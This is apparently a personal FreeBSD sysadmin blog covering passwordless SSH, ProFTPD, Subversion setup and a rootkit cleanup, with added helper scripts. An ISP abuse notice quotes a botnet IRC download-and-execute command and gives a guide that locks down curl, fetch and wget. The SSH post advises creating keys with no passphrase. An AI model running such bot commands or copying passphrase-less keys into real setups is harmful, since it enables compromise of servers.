
How to SSH w/o a password on FreeBSD

Adapted from a Berkeley guide. If you want to SSH between Unix or Linux boxes (e.g. FreeBSD) without typing the password every time, this guide shows how to do that.

First step, on the client do the following:

mkdir -p ~/.ssh
chmod 700 ~/.ssh
ssh-keygen -t rsa

Have it use the default location (~/.ssh/id_rsa), and make sure there is no passphrase. This creates a file containing the private key (id_rsa) and a file containing the public key (id_rsa.pub).

There should be one line of text in id_rsa.pub. Copy it to the server, putting it in ~/.ssh/authorized_keys2. Then execute this command:

chmod 600 authorized_keys2

That's it! Now connect from the client to the server with this command:

ssh server

If that doesn’t work (i.e. it prompts for your password), you may have to try a few things. On one box that I tried, it worked as above. On another, I had to do the following.

ssh -i ~/.ssh/id_rsa server

If that works, create or edit ~/.ssh/config and add these two lines:

Host server
{tab}IdentityFile ~/.ssh/id_rsa

If you SSH as much as I do, this can save lots of time.
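The server-side part of the procedure above as a script, added here as an example that is not part of the original post. It installs the one-line public key into the server's authorized keys file idempotently (running it twice does not duplicate the line) and checks the permissions that sshd's StrictModes setting requires before it will honour the file. It assumes a POSIX sh and find, an OpenSSH-format key line, and takes the home directory, the public key file and optionally the key-file name as arguments; the name defaults to authorized_keys, and OpenSSH's default AuthorizedKeysFile also reads the authorized_keys2 name used above.

```shell
# Added example (not from the original post): install a public key on the
# server idempotently and verify the permissions sshd's StrictModes expects.
# Assumes POSIX sh; HOME_DIR, PUBKEY_FILE and the key-file name are arguments.

# has_mode PATH OCTAL: succeed if PATH's mode bits are exactly OCTAL.
# find -prune stops at the path itself; -perm with a bare mode is an exact match.
has_mode() {
    [ -n "$(find "$1" -prune -perm "$2" -print 2>/dev/null)" ]
}

# install_authorized_key HOME_DIR PUBKEY_FILE [KEYFILE_NAME]
install_authorized_key() {
    home=$1
    pub=$2
    keyfile="$home/.ssh/${3:-authorized_keys}"

    # id_rsa.pub must hold exactly one line in OpenSSH format.
    if [ "$(grep -c '' "$pub")" -ne 1 ]; then
        echo "expected exactly one key line in $pub" >&2
        return 1
    fi
    key=$(cat "$pub")
    case $key in
        "ssh-rsa "*|"ssh-ed25519 "*|"ecdsa-sha2-"*) ;;
        *) echo "not an OpenSSH public key line: $pub" >&2; return 1 ;;
    esac

    mkdir -p "$home/.ssh"
    chmod 700 "$home/.ssh"
    touch "$keyfile"
    chmod 600 "$keyfile"
    # Append only if this exact line is not already present.
    grep -qxF -- "$key" "$keyfile" || printf '%s\n' "$key" >> "$keyfile"
}

# verify_ssh_dir HOME_DIR [KEYFILE_NAME]: succeed only if ~/.ssh is 700 and the
# key file is 600; with StrictModes (the default) sshd ignores a looser key file.
verify_ssh_dir() {
    home=$1
    keyfile="$home/.ssh/${2:-authorized_keys}"
    has_mode "$home/.ssh" 700 && has_mode "$keyfile" 600
}
```

If the login still prompts for a password after copying the key, `verify_ssh_dir` is the first thing to check: a group- or world-readable authorized keys file or a 755 ~/.ssh is silently ignored by sshd, which then falls back to password authentication.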


Proftpd on FreeBSD delay after “Waiting for welcome message…”

I’ve run an FTP server for some time, and it was a minor problem to me that it would always lag a bit on connection. The connection would be something like this:

Status: Connecting to {server url}
Status: Connected with {server url}. Waiting for welcome message...
{10-20 second delay}
Response: 220 {Server Name} (the HELO)

That 10-20 second delay was caused by a reverse DNS lookup; whether it failed or succeeded, I had no need for it. Truthfully, in my /var/log/xferlog I'd rather see
24.20.96.1XX than
c-24-20-96-1XX.hsd1.wa.comcast.net

So to fix it, I added these lines to my /usr/local/etc/proftpd.conf:

#to enable faster logins
UseReverseDNS off
IdentLookups off

Then I restarted the server:


root@sam# /usr/local/etc/rc.d/proftpd.sh restart
Stopping proftpd.
Waiting for PIDS: 577.
Starting proftpd.
root@sam#

And voilà: instead of taking 20+ seconds to connect and authenticate with my server, it's done within 3 seconds.


FreeBSD SSH session timeouts

I was tired of seeing this while logging into my server via SSH:

Read from remote host raybdbomb.com: Connection reset by peer

I messed around with the sshd config a bit and wasn’t able to get it to go away. I’m pretty sure that the connection is being closed by some firewall in the interim. So for a solution, I installed spinner.


cd /usr/ports/sysutils/spinner/
make install clean
spinner

It puts a character on the top left of the console, which keeps the session alive with minimal amounts of data transfer.

Works great! 🙂


How to setup a Subversion server and repository on FreeBSD

I had some trouble with this some months ago, so I thought I would create a guide to do it for my own future reference. The OS I used for this guide was FreeBSD 5.4, but it stands to reason that it would work on others.

First, install subversion from the ports

[root@sam ~]# cd /usr/ports/devel/subversion
[root@sam /usr/ports/devel/subversion]# make install clean

Next, add a user for the subversion server to run under. I made mine “svn” at “/home/svn”. And I made a directory for the repository “/home/svn/rep”.

Next, set up /etc/rc.conf so that the svn server starts on boot (the rc script will not start it at all otherwise). Append this to /etc/rc.conf:

#svn server
svnserve_enable="YES"
#svnserve_flags="-d --listen-port=3690 --listen-host=0.0.0.0"
svnserve_flags="-d -r /home/svn/rep --listen-host=0.0.0.0"
svnserve_data="/home/svn/rep"
svnserve_user="svn"
svnserve_group="svn"

Start your svn server

[root@sam ~]# /usr/local/etc/rc.d/svnserve.sh start

Create the repository with svn

[root@sam ~]# svnadmin create /home/svn/rep

To explicitly set the password file, edit {repository}/conf/svnserve.conf and uncomment the line

password-db = passwd

and do whatever other edits to fine tune your repository.

Edit the password file to your liking, setting up a user with write access. The password file is {repository}/conf/passwd

And voilà, presto 🙂
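The svnserve.conf and passwd edits described above as a script, added here as an example that is not part of the original post. It assumes a POSIX sh and awk, the repository path as its first argument, and the standard svnserve.conf layout (a [general] section with commented-out anon-access, auth-access and password-db lines). It goes slightly beyond the text: besides uncommenting password-db = passwd it also sets anon-access = none, so unauthenticated svn:// clients cannot read the repository, and keeps the plaintext passwd file readable only by its owner.

```shell
# Added example (not from the original post): enable the passwd file in a
# repository's svnserve.conf, add a user, and check the result. Assumes POSIX
# sh and awk; the repository path is the first argument of each function.

# set_general_option CONF KEY VALUE: replace the (possibly commented-out) KEY
# line with "KEY = VALUE", or insert one right after [general] if none exists.
set_general_option() {
    conf=$1 key=$2 val=$3
    if grep -Eq "^[#[:space:]]*$key[[:space:]]*=" "$conf"; then
        awk -v k="$key" -v v="$val" \
            '!done && $0 ~ ("^[# \t]*" k "[ \t]*=") { print k " = " v; done = 1; next } { print }' \
            "$conf"
    else
        awk -v k="$key" -v v="$val" '{ print } /^\[general\]/ { print k " = " v }' "$conf"
    fi > "$conf.tmp" && mv "$conf.tmp" "$conf"
}

# harden_svn_repo REPO: require the passwd file and refuse anonymous access.
harden_svn_repo() {
    conf="$1/conf/svnserve.conf"
    set_general_option "$conf" password-db passwd
    set_general_option "$conf" anon-access none
    set_general_option "$conf" auth-access write
    # svnserve's passwd file is plaintext, so nobody else should be able to read it.
    if [ -f "$1/conf/passwd" ]; then
        chmod 600 "$1/conf/passwd"
    fi
}

# add_svn_user REPO USER PASSWORD: append "USER = PASSWORD" to the [users]
# section of conf/passwd, creating the file if needed.
add_svn_user() {
    pw="$1/conf/passwd"
    grep -qx '\[users\]' "$pw" 2>/dev/null || printf '[users]\n' >> "$pw"
    # Refuse to duplicate a user rather than silently adding a second line.
    if grep -Eq "^$2[[:space:]]*=" "$pw"; then
        echo "user $2 already present in $pw" >&2
        return 1
    fi
    printf '%s = %s\n' "$2" "$3" >> "$pw"
    chmod 600 "$pw"
}

# check_repo_auth REPO: succeed only if svnserve.conf is hardened as above and
# the passwd file is mode 600.
check_repo_auth() {
    conf="$1/conf/svnserve.conf"
    grep -qx 'password-db = passwd' "$conf" &&
    grep -qx 'anon-access = none' "$conf" &&
    [ -n "$(find "$1/conf/passwd" -prune -perm 600 -print 2>/dev/null)" ]
}
```

Run `harden_svn_repo /home/svn/rep` once after `svnadmin create`, then `add_svn_user /home/svn/rep <user> <password>` per committer; svnserve re-reads the conf files on each connection, so no restart is needed. `check_repo_auth` is a quick post-change sanity check, since a stray leading `#` on the password-db line leaves the repository wide open to anonymous reads.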


Root (wute) Kit

Yea, so I received this e-mail from my ISP:

Subject: Policy Enforcement of LTSV-## at {my IP} for IRC Malicious

NOTES: Remove the IRCd software from this server. It is being used for malicious intent.
QUOTE FROM THE
Axxx has changed the topic on channel #lucky to “.dl http://(url)/a.goud5/install.exe a.exe 1 -s”
.l ………. -s
.q

NOTES: I have added an Exploit Removal Guide below my signature block. This will help search for common exploits.

Dear Client,

This is a Policy Enforcement Notice that your server has violated our Acceptable Use Policy available at http://www.layeredtech.com/aup.shtml. Please refer to the attached complaints and/or logs of abuse. If you believe we have traced this issue to you erroneously, our staff will investigate the issue further.

IT IS YOUR RESPONSIBILITY TO REMOVE ALL DOMAINS, USERS, AND CONTENT CAUSING THIS ABUSE ISSUE AND TO INVESTIGATE ANY MISCONFIGURED, INFECTED, OR UNAUTHORIZED USE OF SOFTWARE.

PENDING YOUR REQUIRED REPLY WITH YOUR COMMENTS, QUESTIONS, OR ACTIONS TO RESOLVE THIS ISSUE, THE SERVER IS:

[] Monitored for Additional Violations
[] Accessed for Investigation, Cleaning, Hardening, or Securing
[x] Disconnected in: [] 24-Hours [x] 12-Hours [] 6-Hours [] 1-Hour [] 0-Hours
[] Required Reload Request with: [] New Client Required [] No Data Recovery [] Data Recovery Allowed
at http://support.layeredtech.com under “Open a Ticket”
[] Hard Drives Seized for Investigation
[] Null-Routed
[] Port Shutdown
[] On 30-Day Probation
[] Reviewed for Possible Cancellation
[] Cancelled

FOR THE FOLLOWING REASONS:

[] Child Porn C Hosting, Distributing, or Linking to Pornography Involving a Person Under Legal Age
[] Copyright L Hosting, Distributing, or Linking to Copyright Infringed Materials
[] Cracking H Brute Force Access of Secured Network Devices
[] DoS H Denial of Service Attack of Network Devices
[] Forgery M Faking an IP Address, Hostname, E-Mail Address, or Header
[] Fraud Site H Hosting or Linking to a Website Intended to Deceive the Public
[] Hacking H Circumventing Security Systems of Network Devices
[] HYIP Site M Hosting or Linking to a Website of High Yield Investment Program, Ponzi Scheme, or Pyramid Scheme
[] ID Theft H Hosting, Distributing, or Linking to Stolen Account Identification Information
[] Infection H Hosting, Distributing, or Linking to Exploits, Trojans, Viruses, or Worms
[x] IRC Malicious M Malicious Use of Internet Relay Chat
[] IRC Unregistered L Internet Relay Chat Server not Registered with Layered Technologies
[] Phishing H Identity Theft by Email Under False Pretense
[] ROKSO Spamhaus C ROKSO Blacklisting of an IP at www.spamhaus.org for Malicious Activity
[] Scanning H Probing for Vulnerabilities of Network Devices
[] Shells H Hosting Accounts Primarily for Shell Access
[] Spam Cannon E Sending High Volume Spam (UCE or UBE)
[] Spam Email L Unsolicited Commercial Email (UCE) or Unsolicited Bulk Email (UBE)
[] Spam List M Hosting, Distributing, or Linking to Email Address Lists for Spam
[] Spam Proxy C Hosting an Open Proxy Server Used for Spam
[] Spam Relay C Hosting an Open Mail Relay Used for Spam
[] Spam Hijack C Distributing Spam Through a Third Party Server Vulnerability
[] Spam Site L A Site Advertised by Spam Email or Spam Web
[] Spam Ware H Hosting, Distributing, or Linking to Software Designed for Spamming
[] Spam Web L Unsolicited, Bulk, or Forged Site Advertisement in Web Logs, Forums, or Guestbooks
[] Terrorist Site C Hosting or Linking to a Site Advocating Terrorism
[] Toolz L Hosting, Distributing, or Linking to Cracking, DoS, Forgery, Infection, or Scanning Software or Instruction
[] Trademark L Hosting, Distributing, or Linking to Trade Mark Infringed Materials
[] Warez L Hosting, Distributing, or Linking to Crackz, Hackz, KeyGenz, Serialz, or Pirated Software

[] OTHER:

Thank you for your cooperation,

Layered Technologies Abuse Team

On Thu, 02 Mar 2006 13:01:42 -0600, pen@ev6.net wrote:

>> hello,
>>
>> recently stumbled onto a drone ircd on your network, {my IP}:8080,
>> channel #lucky.
>>
>> i was going to contact the customer directly but their whois info
>> provides no abuse contact or any other usable contact.
>>
>> please null route this ip immediately. the bots on this server are being
>> used to DDoS a customer of ours..
>>
>>
>> thanks,
>> jl, ev6 networks.

Thank you,

Tom
Layered Technologies
Policy Enforcement Technician

ACCEPTABLE USE POLICY at http://layeredtech.com/aup.shtml

### Exploit Removal Guide ###

The following is a first step in finding and removing exploits and root kits on a Linux or BSD system.

1. EXECUTE THE FOLLOWING COMMANDS TO HELP PREVENT UPLOADS OF EXPLOITS:

chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-

2. EXECUTE THE FOLLOWING COMMANDS TO CHECK FOR POSSIBLE EXISTING EXPLOITS:

sh
for x in "/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp"; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web " | grep -E "^$|^/|/$|\*$|\.pl$" | tee exploits.txt; done; echo -e "\n\nPossible Exploit Files and Directories: `grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' '`" | tee -a exploits.txt
exit

Lines ending with an asterisk ‘*’, ‘.pl’, or a slash ‘/’ are possible exploit files or directories which should be investigated and removed followed by rebooting the server to kill any running exploit processes. You can refer to the exploits.txt file generated by the above commands for later reference.

3. You should also install and run the program called rkhunter.

Rootkit Hunter is a scanning tool to ensure you are about 99.9% clean of nasty tools.

This tool scans for rootkits, backdoors and local exploits by running tests like:

– MD5/SHA1 hash compare
– Look for default files used by rootkits
– Wrong file permissions for binaries
– Look for suspected strings in LKM and KLD modules
– Look for hidden files
– Optional scan within plaintext and binary files

WWW: http://www.rootkit.nl/

On BSD systems:
cd /usr/ports/security/rkhunter; make install clean; rehash; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

On RedHat, Fedora, CentOS systems:
yum -y install rkhunter; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

If you cannot do this, our staff will clean, harden, and secure the server for you for a fee, or you can have a 3rd party company do it.

If you cannot secure your server, you should issue a Reload Request of your system at http://support.layeredtech.com under “Open A Ticket”.

And the Rootkit Hunter didn’t find any rootkits… unfortunately. So, it’s time to do a system refresh. I sent this e-mail to the owners of the domains that I host:

Dear “clients”:

The server, nooblet.us which hosts your domain(s), files or e-mails nicely acquired a rootkit today (http://en.wikipedia.org/wiki/Rootkit). I was unable to find out what caused it, or even where it resides, so my ISP strongly recommends I do an OS reload (very soon). I will begin the OS reload on Friday, March 2nd, 2006 (tomorrow), at approximately 2 p.m. PST.

I have installed lots of software on this server, so it might take me a while to get it all caught up and reinstalled. Hopefully I can get it completed within 1 day. During this time, your mail, files, and everything else associated with your domains will not be available.
Also, it has come to my attention that too many of you have ssh access. This is essentially what caused the problem. Unless you make a deal with me to pay for some of the cost of the server, ssh access will be limited to me alone, you will instead only have ftp access to write files to the server. If you need ssh access, send me a message after I restore the server and we can negotiate a price.

The information that *will not* be lost during the server move includes:
1. Files. I have backed up all of the files for your domain and will restore them as soon as I can. My home system has a 30KB/s upload limit, so it might take a while.
2. Domain Configuration. I have backed up the “named” files, so restoring this information should be the first to be done.

The information that *will* be lost during the server move includes:
1. E-mail accounts. This includes both the e-mails themselves and the login/password information. If you want to backup your e-mails, I’d suggest you do that as soon as possible, because it WILL be gone on Friday.
2. Username/password pair combinations. Your login will be lost. I will provide you with your username and a dummy password when the server is restored.

My e-mail {} will be down during the transition, so you can e-mail RnospamDEHLER(at)gmail.com in the meantime with questions or comments.

Sorry for the inconvenience, but really I’m just as inconvenienced as you, if not more.

Please send me your non-nooblet.us hosted e-mail to RnospamDEHLER(at)gmail.com and I can provide you with updates as they come.

Bummer, eh?
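A defender-side version of step 2 of the ISP's removal guide above, added here as an example; it is not part of the ISP's guide or of the original post. It uses find instead of parsing ls output (which breaks on file names with spaces and on the ls column layout), takes the output file and the directories to scan as arguments, and flags regular files that are owner-executable or end in .pl, the two heuristics the guide describes; the owner-based filter for web-server accounts is left out because it only works where those accounts exist. Assumes a POSIX sh and find.

```shell
# Added example (not from the ISP guide or the original post): list candidate
# files in the scratch directories the guide names, using find rather than
# parsed ls output. Assumes POSIX sh and find; OUTFILE and DIRs are arguments.

# scan_suspect_files OUTFILE DIR...: write matching paths to OUTFILE and print
# their count. A match is a regular file that is owner-executable or named
# *.pl, the guide's two heuristics; every hit still needs manual review, since
# a legitimate script in /tmp matches too.
scan_suspect_files() {
    out=$1
    shift
    : > "$out"
    for d in "$@"; do
        [ -d "$d" ] || continue          # skip directories that do not exist here
        find "$d" -type f \( -perm -100 -o -name '*.pl' \) -print 2>/dev/null >> "$out"
    done
    wc -l < "$out" | tr -d ' '
}

# Scratch directories from the guide; pass your own list to override.
DEFAULT_SCAN_DIRS="/dev/shm /tmp /var/spool /var/tmp /usr/local/apache/proxy"

# Stand-alone use: sh scan.sh --run
if [ "${1:-}" = "--run" ]; then
    n=$(scan_suspect_files exploits.txt $DEFAULT_SCAN_DIRS)
    echo "Possible exploit files: $n (listed in exploits.txt)"
fi
```

As with the guide's own loop, the list is a starting point, not a verdict: compare each hit against what the packages and users on the box are expected to leave in those directories, and keep the exploits.txt report with the timestamps of the files for later reference.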

